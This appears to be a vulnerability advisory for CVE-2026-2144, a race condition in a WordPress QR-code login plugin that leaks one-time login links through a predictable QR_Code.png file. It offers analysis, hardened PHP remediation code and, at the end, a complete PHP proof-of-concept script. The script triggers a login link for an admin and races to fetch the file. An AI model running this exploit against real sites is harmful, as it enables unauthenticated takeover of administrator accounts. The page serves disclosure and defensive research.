Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-2144: Magic Login Mail or QR Code <= 2.05 – Unauthenticated Privilege Escalation via Insecure QR Code File Storage (magic-login-mail)

CVE ID: CVE-2026-2144
Severity: High (CVSS 8.1)
CWE: 269
Vulnerable Version: 2.05
Patched Version:
Disclosed: February 12, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-2144 (metadata-based):
The Magic Login Mail or QR Code plugin for WordPress contains an unauthenticated privilege escalation vulnerability. The flaw exists in the plugin’s QR code generation and email dispatch logic. Attackers can exploit a race condition to hijack a one-time login link intended for any user, including administrators, leading to full account compromise.

Atomic Edge research identifies the root cause as improper privilege management (CWE-269). The vulnerability description confirms the plugin creates a predictable file named QR_Code.png in the public uploads directory during the email sending process. The file contains the login URL encoded in the QR code. The plugin only deletes this file after the wp_mail() function completes. This sequence creates a race condition window where the file is publicly accessible. This analysis infers the plugin likely uses a hook like wp_ajax_nopriv_ to handle unauthenticated login link requests, as the description states attackers can trigger a request for any user.

Exploitation requires two concurrent steps. First, an attacker sends a request to the plugin’s unauthenticated AJAX endpoint, likely /wp-admin/admin-ajax.php, with an action parameter such as magic_login_mail_request_link and a target user parameter like user_email or user_id. This triggers the generation of the QR_Code.png file. Second, the attacker must rapidly and repeatedly request the predictable file URL, /wp-content/uploads/{year}/{month}/QR_Code.png, during the brief window before deletion. Successful retrieval of the image allows decoding of the QR code to extract the login URL, granting immediate access to the targeted account.

Remediation requires eliminating the insecure temporary file storage. The patched version likely removed the file-based QR code generation step from the email sending workflow. A secure fix would generate the QR code image in memory and attach it directly to the email without writing to the filesystem. Alternatively, the plugin could generate a cryptographically random, unguessable filename and implement immediate file cleanup with a proper exception handler to ensure deletion even if wp_mail() fails.
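A hardened send path written here as an added example, not code from the plugin or from its patch. It implements both remediation options described above: the QR PNG is attached from memory through WordPress's phpmailer_init action (PHPMailer's addStringAttachment()), so no file is written at all, and, for a mailer that insists on a path, the file gets an unguessable name outside the public uploads tree and is removed in a finally block even when wp_mail() fails. The $qr_png_bytes argument is assumed to come from an in-memory QR library, and the ml_ function names are hypothetical.

```php
<?php
// Added example, not the plugin's code. Assumes $qr_png_bytes already holds
// the PNG a QR library produced in memory from the one-time login URL; the
// ml_* names are hypothetical. Uses WordPress core wp_mail(), add_action(),
// remove_action(), get_temp_dir(), trailingslashit() and PHPMailer's
// addStringAttachment(), all of which exist with the signatures used here.

// Preferred fix: nothing is ever written under /wp-content/uploads/, so a
// concurrent request has no predictable QR_Code.png to fetch.
function ml_send_login_qr_in_memory( string $to, string $qr_png_bytes ): bool {
    $attach = function ( $phpmailer ) use ( $qr_png_bytes ) {
        // Attach straight from the string; 'base64' is PHPMailer's default encoding.
        $phpmailer->addStringAttachment( $qr_png_bytes, 'login-qr.png', 'base64', 'image/png' );
    };
    add_action( 'phpmailer_init', $attach );
    try {
        return wp_mail( $to, 'Your login QR code', 'Scan the attached QR code to sign in.' );
    } finally {
        // Always detach, so a later unrelated wp_mail() call does not carry this QR code.
        remove_action( 'phpmailer_init', $attach );
    }
}

// Fallback when a file path is unavoidable: random name, outside the web root,
// owner-only permissions, and deletion that does not depend on wp_mail() succeeding.
function ml_send_login_qr_tempfile( string $to, string $qr_png_bytes ): bool {
    // 128 bits from random_bytes() make the name unguessable; get_temp_dir() is
    // the system temp directory, which the web server does not serve.
    $path = trailingslashit( get_temp_dir() ) . 'login-qr-' . bin2hex( random_bytes( 16 ) ) . '.png';
    if ( file_put_contents( $path, $qr_png_bytes, LOCK_EX ) === false ) {
        return false;
    }
    try {
        chmod( $path, 0600 ); // keep other local accounts on a shared host from reading it
        return wp_mail( $to, 'Your login QR code', 'Scan the attached QR code to sign in.', '', [ $path ] );
    } finally {
        // Runs on a normal return, a false result and an exception alike,
        // so the file never outlives the send.
        if ( file_exists( $path ) ) {
            unlink( $path );
        }
    }
}
```

The in-memory variant closes the race entirely; the temp-file variant narrows it to a path an attacker cannot predict and a lifetime bounded by the send, and should only be used where the mailer cannot take a string attachment.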

The impact of successful exploitation is severe. An unauthenticated attacker can gain administrative access to a WordPress site. This leads to complete site takeover, allowing installation of backdoors, theme/plugin editing, user creation or deletion, and data exfiltration. The attack chain is reliable if the attacker can win the race condition, which network latency and automated tools can facilitate.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.


PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-2144 - Magic Login Mail or QR Code <= 2.05 - Unauthenticated Privilege Escalation via Insecure QR Code File Storage

$target_url = 'http://vulnerable-site.com'; // CHANGE THIS
$target_user_email = 'admin@vulnerable-site.com'; // CHANGE THIS

// Step 1: Trigger the login link request to generate the QR code file.
// Assumption: The plugin uses an AJAX handler with a 'magic_login_mail_request_link' action.
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$post_data = [
    'action' => 'magic_login_mail_request_link',
    'user_email' => $target_user_email // Assumed parameter name
];

$ch = curl_init($ajax_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 5); // Short timeout to fire and forget
$response = curl_exec($ch);
curl_close($ch);

echo "[*] Triggered login request for: {$target_user_email}\n";

// Step 2: Race to fetch the predictable QR code file.
// Assumption: File is stored in the standard WordPress uploads directory for the current month.
$upload_path = '/wp-content/uploads/' . date('Y') . '/' . date('m') . '/';
$predictable_filename = 'QR_Code.png';
$file_url = $target_url . $upload_path . $predictable_filename;

echo "[*] Attempting to fetch: {$file_url}\n";

$attempts = 50;
for ($i = 0; $i < $attempts; $i++) {
    $ch = curl_init($file_url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_NOBODY, false);
    curl_setopt($ch, CURLOPT_TIMEOUT, 2);
    $file_content = curl_exec($ch);
    $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);

    if ($http_code === 200 && !empty($file_content)) {
        file_put_contents('captured_qr.png', $file_content);
        echo "[+] SUCCESS: Captured QR code to 'captured_qr.png'. Decode this image to extract the login URL.\n";
        exit(0);
    }
    usleep(50000); // 50ms delay between attempts
}

echo "[-] Failed to capture the QR code file within {$attempts} attempts.\n";

?>
